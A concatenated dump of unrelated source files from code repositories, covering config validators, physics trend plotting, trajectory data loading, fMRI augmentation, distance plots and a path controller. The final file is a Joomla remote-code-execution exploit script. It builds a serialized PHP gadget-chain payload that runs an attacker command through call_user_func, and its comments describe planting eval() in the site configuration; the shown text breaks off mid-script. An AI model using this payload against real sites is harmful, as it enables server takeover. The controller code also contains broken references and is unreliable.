'description':{'type': validate.str_range(argument={'low': 1, 'high': 64})}
}))
}
}
field_inputs_detail_deals['title'] = {
'validator': validate.str_range(argument={'low': 1, 'high': 255}),
'type': fields.String()
}
field_inputs_detail_deals['description'] = {
'validator': validate.str_range(argument={'low': 1, 'high': 255}),
'type': fields.String()
}
field_inputs_detail['name'] = {
'validator': validate.str_range(argument={'low': 1, 'high': 254}),
'type': fields.String()
}
field_inputs_detail['rate'] = {
'validator': validate.natural(),
'type': fields.Integer()
#'validator': validate.str_range(argument={'low': 1, 'high': 255}),
## TODO: support fields.Float
#'type': fields.String()
}
field_inputs_detail['id'] = {
'validator': validate.natural(),
'type': fields.Integer()
}
field_inputs_detail['rate_nr'] = {
'validator': validate.natural(),
'type': fields.Integer()
}
field_inputs_detail['user_nr'] = {
'validator': validate.natural(),
'type': fields.Integer()
}
#field_inputs_detail['comments'] = {
## type attribute for marshal
# 'type': { fields.List(fields.Nested({
# 'id': {'type': fields.Integer()},
# 'avatar_url': {'type': fields.String(attribute='description')},
# }))
# },
## validate attribute for reqparse
# 'validator': { fields.List(fields.Nested({
# 'id':{'type': fields.Integer()},
# 'avatar_url':{'type': validate.str_range(argument={'low': 1, 'high': 64})}
# }))
# }
# }
field_inputs_detail['gallery_nr'] = {
'validator': validate.natural(),
'type': fields.Integer()
}
field_inputs_detail['meals'] = {
'validator': validate.str_range(argument={'low': 1, 'high': 254}),
'type': fields.String()
}
field_inputs_detail['features'] = {
'validator': validate.str_range(argument={'low': 1, 'high': 254}),
'type': fields.String()
}
field_inputs_detail['open'] = {
'validator': validate.str_range(argument={'low': 1, 'high': 4}),
'type': fields.String()
}
field_inputs_detail['address'] = {
'validator': validate.str_range(argument={'low': 1, 'high': 254}),
'type': fields.String()
}
field_inputs_detail['dist'] = {
'validator': validate.natural(),
'type': fields.Integer()
}
field_inputs_detail['is_favorite'] = {
'validator': validate.natural(default = 0),
'type': fields.Integer(default = 0)
}
field_inputs_detail['close'] = field_inputs_detail['open'].copy()
field_inputs_post = field_inputs.copy()
field_inputs_post.pop('image_url')
field_inputs_post.pop('id')
for v in ['dist', 'open', 'close', 'address', 'meals', 'features', 'deals']:
field_inputs_post[v] = field_inputs_detail[v].copy()
field_inputs_detail_images_url['bg'] = {
'validator': validate.str_range(argument={'low': 1, 'high': 255}),
'type': fields.String()
}
field_inputs_detail_images_url['icon'] = {
'validator': validate.str_range(argument={'low': 1, 'high': 255}),
'type': fields.String()
}
# TODO: support multi layer
resource_fields_detail_rates, resource_fields_ref, resource_fields_detail = GetResource(
field_inputs_detail_rates, field_inputs_ref, field_inputs_detail, __head_detail_rates__)
resource_fields_detail_deals, resource_fields_ref, resource_fields_detail = GetResource(
field_inputs_detail_deals, field_inputs_ref, field_inputs_detail, __head_detail_deals__)
resource_fields_detail_images_url, resource_fields_ref, resource_fields_detail = GetResource(
field_inputs_detail_images_url, field_inputs_ref, field_inputs_detail, __head_detail_images_url__)
resource_fields_post, resource_fields_ref, resource_fields_wrap = GetResource(
field_inputs_post, field_inputs_ref, field_inputs_wrap, field_inputs_wrap_head)
#resource_fields, resource_fields_ref, resource_fields_wrap = GetResource(
# field_inputs_detail, field_inputs_ref, field_inputs, __head_detail__)
resource_fields, resource_fields_ref, resource_fields_wrap = GetResource(
field_inputs, field_inputs_ref, field_inputs_wrap, field_inputs_wrap_head)
| arvin-chou/mc | module/customer/business_valid.py | business_valid.py | py | 7,332 | python | en | code | 0 | github-code | 50 |
40091656390 | from __future__ import print_function
import ROOT
ROOT.gROOT.SetBatch(True)
from setTDRStyle import setTDRStyle
from granularity import *
import os
try:
base = os.environ['CMSSW_BASE']
except KeyError:
base = "../../../../.."
# 2016 is missing here
lumiFiles = {
2016: "{base}/src/Alignment/APEEstimation/data/lumiperrun2016.txt",
2017: "{base}/src/Alignment/APEEstimation/data/lumiperrun2017.txt",
2018: "{base}/src/Alignment/APEEstimation/data/lumiperrun2018.txt",
}
pixelIOVs = {
2016: [271866, 276315, 278271, 280928],
2017: [297281, 298653, 299443, 300389, 301046, 302131, 303790, 303998, 304911],
2018: [316758, 317527, 317661, 317664, 318227, 320377],
}
lumis = {}
intLumis = {}
runs = {}
years = []
for year in lumiFiles.keys():
runs[year] = []
years.append(year)
intLumis[year] = 0
with open(lumiFiles[year].format(base=base), "r") as fi:
for line in fi:
if len(line) == 0:
continue
line = line.strip()
run, lumi = line.split(" ")
run = int(run)
lumi = float(lumi)*0.001 # convert to fb^-1
lumis[run] = lumi
runs[year].append(run)
intLumis[year] += lumi
years.sort()
def runToLumi(whichRun, fromYear, inclusive=False):
lumiResult = 0.0
for year in years:
if year < fromYear:
continue
for run in runs[year]:
if run > whichRun:
break
if run < whichRun:
lumiResult += lumis[run]
if run == whichRun and inclusive:
lumiResult += lumis[run]
return lumiResult
def whichYear(run):
thisYear = -1
years = list(runs.keys())
years.sort()
for year in years:
if min(runs[year]) <= run:
thisYear = year
return thisYear
print("Run %d not in range of any year"%(run))
return -1
class TrendPlotter:
def __init__(self):
setTDRStyle()
self.names = {}
self.outPath = None
self.granularity = standardGranularity
self.title = ""
self.points = []
self.years = []
self.doLumi = True
self.colors = []
self.log = False
def addTrend(self, label, points, dashed=False, color=None, marker=None):
self.points.append( (label, points, dashed, color, marker) )
if color:
self.colors.append(color)
def setGranularity(self, granularity):
self.granularity = granularity
def setOutputPath(self, outPath):
self.outPath = outPath
def setTitle(self, title):
self.title = title
def setLog(self, log=True):
self.log = log
def convertName(self, name):
out = name.replace("Bpix", "BPIX")
out = out.replace("Fpix", "FPIX")
out = out.replace("Plus", "+")
out = out.replace("Minus", "-")
out = out.replace("Fpix", "FPIX")
out = out.replace("Tib", "TIB")
out = out.replace("Tob", "TOB")
out = out.replace("Tid", "TID")
out = out.replace("Tec", "TEC")
out = out.replace("Layer", " L")
out = out.replace("Ring", " R")
out = out.replace("Stereo", "S")
out = out.replace("Rphi", "R") # other than Ring, this one does not add a space in front
out = out.replace("In", "i")
out = out.replace("Out", "o")
return out
def drawTrendPlot(self, sector, coordinate, number):
self.canvas = ROOT.TCanvas("canvas%s_%s"%(sector, coordinate), "canvas", int(ROOT.gStyle.GetCanvasDefW()*3),ROOT.gStyle.GetCanvasDefH())
ROOT.gPad.SetLeftMargin(0.06)
ROOT.gPad.SetRightMargin(0.04)
iTrend = 0
if self.log:
minApe = 0.9
maxApe = 7000.0
ROOT.gPad.SetLogy()
else:
minApe = 0
maxApe = 100
# calibrate runrange
firstRun = 999999
lastRun = 0
for label, points, dashed, color, marker in self.points:
firstRun = min(min(points, key=lambda x:x[0])[0], firstRun)
lastRun = max(max(points, key=lambda x:x[1])[1], lastRun)
theFirstRun = firstRun
theLastRun = lastRun
firstYear = whichYear(firstRun)
lastYear = whichYear(lastRun)
minLumi = 0
maxLumi = 0
for year in intLumis.keys():
if year >= firstYear and year <= lastYear:
maxLumi += intLumis[year]
verticalLines = []
lineLabels = []
i = 0
for year in range(firstYear, lastYear+1):
for position in pixelIOVs[year]:
if self.doLumi:
posLumi = runToLumi(position, firstYear, False)
else:
posLumi = position
vLine = ROOT.TLine(posLumi,minApe,posLumi,maxApe)
vLine.SetLineStyle(9)
vLine.SetLineColor(ROOT.kRed)
verticalLines.append(vLine)
posApe = 70+3.5*(maxApe-minApe)/100*(i % 5)
text = ROOT.TLatex(posLumi + (maxLumi-minLumi)*0.003 , posApe, str(position))
text.SetTextFont(42)
text.SetTextSize(0.035)
text.SetTextColor(ROOT.kRed+2)
lineLabels.append(text)
i += 1
legend = ROOT.TLegend(0.07, 0.89, 0.935, 0.96)
legend.SetTextFont(42)
legend.SetTextSize(0.045)
legend.SetFillStyle(0)
legend.SetBorderSize(0)
legend.SetNColumns(5)
if self.doLumi:
hAxisLumi = ROOT.TH2F("hAxisRun%s_%s"%(sector, coordinate),"", 10, float(minLumi), float(maxLumi), 10, minApe, maxApe)
hAxisLumi.SetTitle(";integrated luminosity [fb^{-1}];#sigma_{align," + coordinate.lower() + "} [#mum]")
else:
hAxisLumi = ROOT.TH2F("hAxisRun%s_%s"%(sector, coordinate),"", 10, theFirstRun, theLastRun, 10, minApe, maxApe)
hAxisLumi.SetTitle(";Run number;#sigma_{align," + coordinate.lower() + "} [#mum]")
hAxisLumi.GetYaxis().SetTitleOffset(0.4)
hAxisLumi.GetXaxis().SetNdivisions(510)
hAxisLumi.Draw("AXIS")
trends = []
useColor = 1
for label, points, dashed, color, marker in self.points:
iTrend += 1
graphLumi = ROOT.TGraphErrors()
trends.append(graphLumi)
if color:
graphLumi.SetLineColor(color)
graphLumi.SetMarkerColor(color)
else:
while True:
if useColor not in self.colors and useColor not in [0,10]:
self.colors.append(useColor)
graphLumi.SetLineColor(useColor)
graphLumi.SetMarkerColor(useColor)
break
useColor += 1
if marker:
graphLumi.SetLineWidth(0)
graphLumi.SetMarkerSize(1.3)
graphLumi.SetMarkerStyle(marker)
else:
graphLumi.SetLineWidth(2)
graphLumi.SetMarkerSize(0)
graphLumi.SetMarkerStyle(20)
if dashed:
graphLumi.SetLineStyle(2)
iPoint = 0
for firstRun, lastRun, file in points:
fi = ROOT.TFile(file, "READ")
nameTree = fi.Get("nameTree")
apeTree = fi.Get("iterTree{}".format(coordinate))
nameTree.GetEntry(0)
apeTree.GetEntry(apeTree.GetEntries()-1)
sectorApe = 10000. * (float(getattr(apeTree, "Ape_Sector_{}".format(sector))))**0.5
sectorName = str(getattr(nameTree, "Ape_Sector_{}".format(sector)))
# this could be done centrally for each trend and then not be redone for each sector
# but it does not take too much time (most time is spent reading out ROOT files)
if self.doLumi:
lumiStart = runToLumi(firstRun, firstYear, False)
lumiEnd = runToLumi(lastRun, firstYear, True)
else:
lumiStart = firstRun
lumiEnd = lastRun
xPosLumi = (lumiStart+lumiEnd) / 2
xErrLumi = -(lumiStart-lumiEnd) / 2
graphLumi.SetPoint(iPoint, xPosLumi, sectorApe)
graphLumi.SetPointError(iPoint, xErrLumi,0)
iPoint += 1
fi.Close()
graphLumi.Draw("PZ same")
if marker:
legend.AddEntry(graphLumi, label, "pl")
else:
legend.AddEntry(graphLumi, label, "l")
cmsText = ROOT.TLatex(0.16,0.96,self.title)
cmsText.SetTextFont(42)
cmsText.SetNDC()
cmsText.Draw("same")
sectorText = ROOT.TLatex(0.9,0.96,sectorName)
sectorText.SetTextAlign(31)
sectorText.SetTextFont(42)
sectorText.SetNDC()
sectorText.Draw("same")
for vLine in verticalLines:
vLine.Draw("same")
for llabel in lineLabels:
llabel.Draw("same")
legend.Draw("same")
ROOT.gPad.RedrawAxis()
import os
if not os.path.isdir("{}/{}".format(self.outPath, self.granularity.names[coordinate][number])):
os.makedirs("{}/{}".format(self.outPath, self.granularity.names[coordinate][number]))
app = ""
if not self.doLumi:
app = "_byRun"
self.canvas.SaveAs("{}/{}/trend_{}_{}{}.pdf".format(self.outPath, self.granularity.names[coordinate][number], coordinate, sectorName, app))
self.canvas = None
def draw(self):
for coordinate in self.granularity.sectors.keys():
plotNumber = 0
rangeList = self.granularity.sectors[coordinate]
for sectorRange in rangeList:
for sector in range(sectorRange[0], sectorRange[1]+1):
self.drawTrendPlot(sector, coordinate, plotNumber)
plotNumber += 1
def main():
pass
if __name__ == "__main__":
main()
| cms-sw/cmssw | Alignment/APEEstimation/test/plottingTools/trendPlotter.py | trendPlotter.py | py | 10,561 | python | en | code | 985 | github-code | 50 |
71090059675 |
# base class
from Code.dataset.dataloader import Loader
# data manipulation and tools
import numpy as np
from Code.dataset.DataModel import *
import os
# shifts libraries
from ysdc_dataset_api.dataset import MotionPredictionDataset
from ysdc_dataset_api.features import FeatureRenderer
from ysdc_dataset_api.utils import get_file_paths, scenes_generator, transform_2d_points, VehicleTrack
class ShiftsLoader(Loader):
def __init__(self, DATAROOT, pickle=True, pickle_filename='/data/shifts/data.pkl', chunk=(0, 1000), verbose=True):
# super constructor
super(ShiftsLoader, self).__init__(DATAROOT, verbose)
self.renderer = None
# flag to indicate if data can be loaded from pickle files
pickle_ok: bool = os.path.isfile(pickle_filename)
if pickle and pickle_ok:
# its okay to read pickle files to load data
self.load_pickle_data(pickle_filename)
else:
# load data from scratch
self.load_data(chunk)
self.save_pickle_data(pickle_filename)
ShiftsAgent.context_dict = self.dataset.contexts
def load_ego_vehicles_and_context(self, ego_id, ego_steps, location=None):
ego_vehicle = ShiftsEgoVehicle(ego_id, location)
self.dataset.add_ego_vehicle(ego_id, ego_vehicle)
for i, step in enumerate(ego_steps):
# step_id should be the id of the context object in the Context scene
step_id = ego_id + '_' + str(i)
self.dataset.add_context(step_id, Context(step_id))
step = ShiftsEgoStep(step.position.x, step.position.y, step.yaw, step.linear_velocity.x,
step.linear_velocity.y, step.linear_acceleration.x, step.linear_acceleration.y)
ego_vehicle.add_step(step_id, step)
def load_data(self, chunk=(0, 1000)):
def get_step(track, ego):
agent_step = ShiftTimeStep(track.position.x, track.position.y, track.yaw, track.linear_velocity.x,
track.linear_velocity.y, track.linear_acceleration.x, track.linear_acceleration.y,
ego.position.x, ego.position.y, ego.yaw)
return agent_step
filepaths = get_file_paths(self.DATAROOT)
scenes_paths = scenes_generator(filepaths[chunk[0]: chunk[1]], yield_fpath=True)
# traverse scenes
for scene, path in scenes_paths:
#get tracks of interest
prediction_requests_ids = {pr.track_id for pr in scene.prediction_requests}
# join past and future steps
timesteps = list(scene.past_vehicle_tracks) + list(scene.future_vehicle_tracks)
ego_steps = list(scene.past_ego_track) + list(scene.future_ego_track)
# load ego vehicle and contexts of the scene
self.load_ego_vehicles_and_context(scene.id, ego_steps, location=path)
# traverse each past timestep
for i, (track_step, ego_step) in enumerate(zip(timesteps, ego_steps)):
context_id = scene.id + '_' + str(i)
# traverse all agents
for track in track_step.tracks:
# build a unique agent id in all dataset
agent_id = scene.id + '_' + str(track.track_id)
# if agent IS NOT A CANDIDATE FOR PREDICTION, add as non prediction agent
if track.track_id not in prediction_requests_ids:
# CREATE agent if does not exist. Use path as map name (SEE ShitAgent doc)
if self.dataset.non_pred_agents.get(agent_id) is None:
self.dataset.non_pred_agents[agent_id] = ShiftsAgent(agent_id, scene.id, path)
# insert timestep, step_id = context_id
self.dataset.non_pred_agents[agent_id].add_step(context_id, get_step(track, ego_step))
# insert as non prediction neighbor
self.dataset.contexts[context_id].add_non_pred_neighbor(agent_id)
else:
# CREATE agent if does not exist. Use path as map name (SEE ShitAgent doc)
if self.dataset.agents.get(agent_id) is None:
print('new agent: ', agent_id) if self.verbose else None
self.dataset.agents[agent_id] = ShiftsAgent(agent_id, scene.id, path)
# insert timestep, step_id = context_id
self.dataset.agents[agent_id].add_step(context_id, get_step(track, ego_step))
# insert agent as neighbor (scene.id + i = context_id or same as step_id)
self.dataset.contexts[context_id].add_pred_neighbor(agent_id)
| Juan-Baldelomar/Vehicle_Trajectory_Forecasting | Code/dataset/shifts_dataloader.py | shifts_dataloader.py | py | 4,816 | python | en | code | 5 | github-code | 50 |
7521405350 | import os
import numpy as np
import pandas as pd
import re
import tsaug
from tsaug.visualization import plot
'''
Segmentation of time series and addition of noise
'''
old_path = './data_fMRI'
save_path = 'data_augm'
for root_dir, sub_dirs, _ in os.walk(old_path):
for sub_dir in sub_dirs:
save_dir = os.path.join(save_path, sub_dir)
if not os.path.exists(save_dir):
os.makedirs(save_dir)
else:
file_names = os.listdir(save_dir)
for files in file_names:
c_path = os.path.join(save_dir, files)
os.remove(c_path)
file_names = os.listdir(os.path.join(root_dir, sub_dir))
file_names = list(filter(lambda x: x != 'ROI_CenterOfMass.xlsx', file_names))
for file in file_names:
read_path = os.path.join(old_path, sub_dir, file)
init_data = pd.read_excel(read_path, header=None)
n = np.array(init_data)
noised_init_data = tsaug.AddNoise(scale=0.12).augment(n.T)
noised_init_data = noised_init_data.T
noised_init_data2 = tsaug.Convolve(window="hann", size=5).augment(n.T)
noised_init_data2 = noised_init_data2.T
# X = np.array(init_data)
# plot(X)
n = int(init_data.shape[0] / 5)
for i in range(5):
single_data = init_data[i * n:(i + 1) * n]
noised_single_data = noised_init_data[i * n:(i + 1) * n]
noised_single_data2 = noised_init_data2[i * n:(i + 1) * n]
file_save_name = re.sub(r'.xlsx', '_%i.npy' % i, file)
noised_file_save_name = re.sub(r'.xlsx', '_noised_%i.npy' % i, file)
noised_file_save_name2 = re.sub(r'.xlsx', '_noised2_%i.npy' % i, file)
np.save(os.path.join(save_dir, file_save_name), single_data)
np.save(os.path.join(save_dir, noised_file_save_name), noised_single_data)
np.save(os.path.join(save_dir, noised_file_save_name2), noised_single_data2)
| GraphW/LGSL | augmentation.py | augmentation.py | py | 2,139 | python | en | code | 1 | github-code | 50 |
39754220100 | import matplotlib.pyplot as plt
from statistics import mean, stdev
from sys import argv
from glob import glob
import csv
__author__ = "Garance Gourdel, Pierre Peterlongo"
__email__ = "pierre.peterlongo@inria.fr, garance.gourdel@inria.fr"
def reorder(x, y_dict):
sorted_y = dict()
for k, y in y_dict.items():
zipped_lists = zip(x, y)
sorted_pairs = sorted(zipped_lists)
tuples = zip(*sorted_pairs)
_, sorted_y[k] = [list(tuple) for tuple in tuples]
return sorted_y
def parse_csv(filename):
output = dict()
with open(filename, "r") as file:
reader_csv = csv.reader(file)
reader = [row for row in reader_csv]
details = reader[0]
assert details[4] == "percentage of Indel"
output["ID"] = float(details[5])
assert details[6] == "percentage of SNP"
output["SNP"] = float(details[7])
assert details[8] == "proba Homopolymer extension"
output["H"] = float(details[9])
assert details[10] == "proba substitution sequencing"
output["seq_S"] = float(details[11])
assert (
reader[1][1] == "biological_var"
and reader[1][2] == "seq_S"
and reader[1][3] == "seq_H"
)
output["biological_var"] = [int(row[1]) for row in reader[2:]]
output["mean_bio"], output["stdev_bio"] = mean(output["biological_var"]), stdev(
output["biological_var"]
)
output["seq_S"] = [int(row[2]) for row in reader[2:]]
output["nb_homopoly"] = [int(row[3]) for row in reader[2:]]
assert reader[1][-1] == "min ED" and reader[1][-2] == "min DTW"
output["ED"] = [int(row[-1]) for row in reader[2:]]
output["DTW"] = [int(row[-2]) for row in reader[2:]]
return output
def minus_bio_var(output):
output["DTW_less_bio"] = [
output["DTW"][i] - output["biological_var"][i]
for i in range(len(output["DTW"]))
]
output["ED_less_bio"] = [
output["ED"][i] - output["biological_var"][i] for i in range(len(output["DTW"]))
]
def avg_same_x(x, y_dict):
y_mean, y_stdev = {}, {}
current_y = {}
unique_x = []
for k, y in y_dict.items():
y_mean[k] = []
y_stdev[k] = []
current_y[k] = []
last_x = 0
for i in range(len(x)):
if x[i] == last_x:
for k, y in y_dict.items():
current_y[k].append(y[i])
else:
unique_x.append(last_x)
for k, y in y_dict.items():
if len(current_y[k]) > 0:
y_mean[k].append(mean(current_y[k]))
if len(current_y[k]) > 1:
y_stdev[k].append(stdev(current_y[k]))
else:
y_stdev[k].append(0)
current_y[k] = [y[i]]
last_x = x[i]
unique_x.append(last_x)
for k, y in y_dict.items():
if len(current_y[k]) == 1:
y_mean[k].append((current_y[k][0]))
y_stdev[k].append(0)
if len(current_y[k]) > 2:
y_mean[k].append(mean(current_y[k]))
y_stdev[k].append(stdev(current_y[k]))
current_y[k] = []
return unique_x, y_mean, y_stdev
def parse_args():
other = {"ID": "H", "H": "ID"}
param = {"ID": "*", "H": "*", "SNP": 0.01}
param["basename"] = argv[1]
tmp_parse = param["basename"].split("_")
assert tmp_parse[-2] == "N"
param["N"] = int(tmp_parse[-1])
param["fixed"] = argv[2]
assert param["fixed"] in ["ID", "H"]
param["varying"] = other[param["fixed"]]
param[param["fixed"]] = float(argv[3])
# Get values
x = []
y_mean = {"DTW": [], "ED": [], "bio": []}
y_stdev = {"DTW": [], "ED": [], "bio": []}
all_values = {
"biological_var": [],
"nb_homopoly": [],
"ED": [],
"DTW": [],
"ED_less_bio": [],
"DTW_less_bio": [],
}
path = f"{param['basename']}_ID_{param['ID']}_SNP_{param['SNP']}_H_{param['H']}_seqS_0.001*.csv"
print(path)
for name in glob(path):
output = parse_csv(name)
minus_bio_var(output) # Deducts the bio distance !
x.append(output[param["varying"]])
all_values["biological_var"] += output["biological_var"]
all_values["nb_homopoly"] += output["nb_homopoly"]
all_values["ED"] += output["ED"]
all_values["DTW"] += output["DTW"]
all_values["ED_less_bio"] += output["ED_less_bio"]
all_values["DTW_less_bio"] += output["DTW_less_bio"]
y_mean["DTW"].append(mean(output["DTW_less_bio"]))
y_stdev["DTW"].append(stdev(output["DTW_less_bio"]))
y_mean["ED"].append(mean(output["ED_less_bio"]))
y_stdev["ED"].append(stdev(output["ED_less_bio"]))
y_mean["bio"].append(mean(output["biological_var"]))
y_stdev["bio"].append(stdev(output["biological_var"]))
x, y_mean, y_stdev = sorted(x), reorder(x, y_mean), reorder(x, y_stdev)
print("mean DTW: ", y_mean["DTW"])
print("stdev DTW: ", y_stdev["DTW"])
plot_avg_mean_stdev(param, x, y_mean, y_stdev)
plt.figure().clear()
print(
f"Average ratio DTW/bio_dist: {mean([all_values['DTW'][i]/(all_values['biological_var'][i]) for i in range(len(all_values['DTW'])) if all_values['biological_var'][i] > 0])}"
)
print(
f"Stdev ratio DTW/bio_dist: {stdev([all_values['DTW'][i]/(all_values['biological_var'][i]) for i in range(len(all_values['DTW'])) if all_values['biological_var'][i] > 0])}"
)
print(
f"Average ratio ED/bio_dist: {mean([all_values['ED'][i]/(all_values['biological_var'][i]) for i in range(len(all_values['DTW'])) if all_values['biological_var'][i] > 0])}"
)
print(
f"Stdev ratio ED/bio_dist: {stdev([all_values['ED'][i]/(all_values['biological_var'][i]) for i in range(len(all_values['DTW'])) if all_values['biological_var'][i] > 0])}"
)
x = all_values["nb_homopoly"]
all_values.pop("biological_var", None)
all_values["DTW"] = all_values["DTW_less_bio"]
all_values["ED"] = all_values["ED_less_bio"]
all_values.pop("DTW_less_bio", None)
all_values.pop("ED_less_bio", None)
x, y = sorted(x), reorder(x, all_values)
x, y_mean, y_stdev = avg_same_x(x, y)
param["varying"] = "HOM"
plot_avg_mean_stdev(param, x, y_mean, y_stdev, "_bio_var")
def simple_plot(param, x, y):
x_legend = {
"H": "Number of homopolymer extension",
"bio": f"Number of IN, DEL or SUB with repartition ",
}
for k in y:
plt.plot(x, y[k], label=k)
# plt.plot(x, [1] * len(x), color="black")
plt.ylabel("Distance - biological variation")
plt.xlabel(x_legend[param["varying"]])
# plt.yscale("log")
plt.title(
f"Edit and dynamic time warping distance as a function\n of the number of homopolymer extensions"
)
plt.legend(loc="upper left")
plt.savefig(
f"{param['basename']}_nb_IDS_fixed_{param['fixed']}_{param[param['fixed']]}.png"
)
def plot_avg_mean_stdev(param, x, y_mean, y_stdev, suffix=""):
x_legend = {
"ID": "Probability of IN, DEL or SUB error",
"H": "$p_{hom}$",
"HOM": "Number of character added by homopolymer extensions",
}
for k in y_mean:
# plt.plot(x, y_mean[k], label=k)
if k != "bio":
plt.errorbar(x, y_mean[k], y_stdev[k], label=k, fmt="-o")
plt.ylabel("Average (distance $-$ biological diversity)")
plt.xlabel(x_legend[param["varying"]])
# plt.title(
# f"Average distance for fixed {x_legend[param['fixed']]}\n equal to {param[param['fixed']]}, each point averaged over {param['N']} sequences"
# )
plt.legend(loc="upper left")
plt.savefig(
f"{param['basename']}_fixed_{param['fixed']}_{param[param['fixed']]}"
+ suffix
+ ".png"
)
def main():
parse_args()
if __name__ == "__main__":
main()
| fnareoh/DTW | src/experiments/plot.py | plot.py | py | 7,939 | python | en | code | 1 | github-code | 50 |
26440358305 | import sys
input = sys.stdin.readline
n = int(input())
monkeys = list(map(int, input().split()))
sum_monkeys = sum(monkeys)
total = int(input())
if total >= sum_monkeys:
print(max(monkeys))
else:
x = total // n
def over_check(total, monkeys, x):
for i in monkeys:
if i >= x:
total -= x
else:
total -= i
if total < 0:
return False
else:
return True
while True:
if over_check(total, monkeys, x):
x += 1
else:
print(x-1)
break
| mskyun721/algorithm_practice | aivle_coding_master/4271.py | 4271.py | py | 625 | python | en | code | 0 | github-code | 50 |
17438106411 | import numpy as np
coef = np.zeros((3,3))
rhs = np.zeros((3,1))
for i in range(3):
for j in range(3):
coef[i][j] = int(input(f"Input C{i*4+j+1}: "))
rhs[i][0] = int(input(f"Input C{(i+1)*4}: "))
print()
try:
ans = np.matmul(np.linalg.inv(coef),rhs)
print("Solution:")
print(f"x ={ans[0][0]:.2f}")
print(f"y ={ans[1][0]:.2f}")
print(f"z ={ans[2][0]:.2f}")
except:
print("Unable to find a solution")
| HiMAIayas/SIIT_Lab | GTS123 (Intro To ComProg)/lab10 (np linalg)/lab10_2.py | lab10_2.py | py | 456 | python | en | code | 0 | github-code | 50 |
35952217100 |
import numpy as np
from .common import convert_orientation, compute_theta, angles_difference
class MoveMPC(object):
def __init__(self, frame, max_speed):
self._frame = frame
self._horizon = 10
self._dt = 0.1
speed_bounds = [(0, max_speed) for _ in range(self._horizon)]
steer_bounds = [(-1, 1) for _ in range(self._horizon)]
self.bounds = np.array(
speed_bounds + steer_bounds
)
self.last_v0 = 0.0
self.last_w0 = 0.0
def __model(self, prev_pos, v, w):
new_pos = [0.0, 0.0, 0.0]
new_pos[0] = prev_pos[0] + v * np.cos(prev_pos[2]) * self._dt
new_pos[1] = prev_pos[1] + v * np.sin(prev_pos[2]) * self._dt
new_pos[2] = convert_orientation(prev_pos[2] + w * self._dt)
return new_pos
def __find_clothest_point(self, trajectory, pos):
path = trajectory
cur_pose = np.array(pos[:2])
idx = (np.linalg.norm(path - cur_pose, axis=1)).argmin()
path = np.array(trajectory[idx:])
return idx
def __distance_between_poses(self, p1, p2):
p1 = np.array(p1[:2])
p2 = np.array(p2[:2])
return np.linalg.norm(p1 - p2)
def __distance_table(self, trajectory):
table = list()
dist = 0
table[trajectory.shape[0] - 1] = dist
for index in range(trajectory.shape[0] - 1, -1, -1):
p1 = trajectory[index]
p2 = trajectory[index + 1]
dist += self.__distance_between_poses(p1, p2)
table[index] = dist
return table
def cost_function(self, x, init_pos, trajectory):
cost = 0
a_w = 1.0
a_v = 1.0
a_dw = 1.0
a_dv = 1.0
a_dtheta = 1.0
a_l_err = 1.0
a_s_distance = 1.0
last_pos = init_pos
target_traj_id = self.__find_clothest_point(trajectory, last_pos)
distances = self.__distance_table(trajectory)
for i in range(self._horizon):
w = x[i + self._horizon]
v = x[i]
cost += a_w * w * w
cost += a_v * v * v
cur_pos = self.__model(last_pos, v, w)
if i != 0:
dw = w - x[i + self._horizon - 1]
dv = v - x[i - 1]
if dw > 0.1:
cost += 1000 * a_dw * dw * dw
else:
cost += a_dw * dw * dw
cost += a_dv * dv * dv
# cost += 10 * (v - 0.1) ** 2
if target_traj_id == trajectory.shape[0] - 1:
ps = trajectory[target_traj_id - 1]
pe = trajectory[target_traj_id]
else:
ps = trajectory[target_traj_id]
pe = trajectory[target_traj_id + 1]
theta = compute_theta(ps, pe)
dtheta = angles_difference(theta, cur_pos[2])
cost += a_dtheta * dtheta * dtheta
target_traj_id = max(
self.__find_clothest_point(trajectory, cur_pos),
target_traj_id
)
cost += a_s_distance * distances[target_traj_id]
last_pos = cur_pos
l_error = self.__distance_between_poses(
cur_pos,
trajectory[target_traj_id]
)
cost += a_l_err * l_error * l_error
return cost
def execute(self, target):
trajectory = np.array([p[:2] for p in self._frame.get_trajectory_as_list()])
v0 = [self.last_v0 for _ in range(self._horizon)]
w0 = [self.last_w0 for _ in range(self._horizon)]
x0 = np.array(v0 + w0)
init_pos = self._frame.get_robot_pose()
# v = self._frame.get_robot_speed()
solution = optimize.minimize(self.cost_function,
x0=x0,
bounds=self.bounds,
args=(init_pos, trajectory),
method='SLSQP',
tol=1e-5,
options={'eps': 0.01, 'disp': False})
if solution.success:
self.last_v0 = solution.x[0]
self.last_w0 = solution.x[self._horizon]
return self.last_v0, self.last_w0
return None, None
| kantengri/mown-project | planning/move_controller/src/move_controller/move_mpc.py | move_mpc.py | py | 4,374 | python | en | code | 3 | github-code | 50 |
71023219997 | #!/usr/bin/env python3
import requests
from bs4 import BeautifulSoup
import sys
import string
import random
import argparse
from termcolor import colored
PROXS = {'http':'127.0.0.1:8080'}
PROXS = {}
def random_string(stringLength):
letters = string.ascii_lowercase
return ''.join(random.choice(letters) for i in range(stringLength))
backdoor_param = random_string(50)
def print_info(str):
print(colored("[*] " + str,"cyan"))
def print_ok(str):
print(colored("[+] "+ str,"green"))
def print_error(str):
print(colored("[-] "+ str,"red"))
def print_warning(str):
print(colored("[!!] " + str,"yellow"))
def get_token(url, cook):
token = ''
resp = requests.get(url, cookies=cook, proxies = PROXS)
html = BeautifulSoup(resp.text,'html.parser')
# csrf token is the last input
for v in html.find_all('input'):
csrf = v
csrf = csrf.get('name')
return csrf
def get_error(url, cook):
resp = requests.get(url, cookies = cook, proxies = PROXS)
if 'Failed to decode session object' in resp.text:
#print(resp.text)
return False
#print(resp.text)
return True
def get_cook(url):
resp = requests.get(url, proxies=PROXS)
#print(resp.cookies)
return resp.cookies
def gen_pay(function, command):
# Generate the payload for call_user_func('FUNCTION','COMMAND')
template = 's:11:"maonnalezzo":O:21:"JDatabaseDriverMysqli":3:{s:4:"\\0\\0\\0a";O:17:"JSimplepieFactory":0:{}s:21:"\\0\\0\\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:5:"cache";b:1;s:19:"cache_name_function";s:FUNC_LEN:"FUNC_NAME";s:10:"javascript";i:9999;s:8:"feed_url";s:LENGTH:"PAYLOAD";}i:1;s:4:"init";}}s:13:"\\0\\0\\0connection";i:1;}'
#payload = command + ' || $a=\'http://wtf\';'
payload = 'http://l4m3rz.l337/;' + command
# Following payload will append an eval() at the enabled of the configuration file
